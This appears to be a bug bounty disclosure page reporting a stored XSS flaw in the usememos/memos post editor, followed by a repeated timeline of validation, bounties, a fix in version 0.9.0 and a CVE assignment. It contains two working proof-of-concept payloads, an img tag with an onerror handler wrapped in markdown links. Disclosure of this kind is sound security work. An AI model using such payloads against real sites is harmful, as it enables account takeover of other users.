Stored XSS while creating a new post in usememos/memos

Valid

Reported on

Dec 19th 2022

Description

After login create a new post and type the following text with XSS payload

XSS in create post [<img src=x onerror=alert(1)>](http://test.cc)

then click post that will be executed.

XSS in create post [te<img src=x onerror=alert(1)>te](http://google.com)

Users account takeover + admin

We are processing your report and will contact the usememos/memos team within 24 hours. 21 days ago

Mohamed Abdelhady modified the report

20 days ago

Mohamed Abdelhady modified the report

20 days ago

We have contacted a member of the usememos/memos team and are waiting to hear back 20 days ago

A usememos/memos maintainer validated this vulnerability 19 days ago

Mohamed Abdelhady has been awarded the disclosure bounty

The fix bounty is now up for grabs

The researcher's credibility has increased: +7

commented 19 days ago

Researcher

Can You assign it as CVE !

STEVEN marked this as fixed in 0.9.0 with commit 65cc19 17 days ago

STEVEN has been awarded the fix bounty

This vulnerability has been assigned a CVE

STEVEN published this vulnerability 17 days ago

to join this conversation

We are processing your report and will contact the usememos/memos team within 24 hours. 21 days ago

Mohamed Abdelhady modified the report

20 days ago

Mohamed Abdelhady modified the report

20 days ago

We have contacted a member of the usememos/memos team and are waiting to hear back 20 days ago

A usememos/memos maintainer validated this vulnerability 19 days ago

Mohamed Abdelhady has been awarded the disclosure bounty

The fix bounty is now up for grabs

The researcher's credibility has increased: +7

commented 19 days ago

Researcher

Can You assign it as CVE !

STEVEN marked this as fixed in 0.9.0 with commit 65cc19 17 days ago

STEVEN has been awarded the fix bounty

This vulnerability has been assigned a CVE

STEVEN published this vulnerability 17 days ago

to join this conversation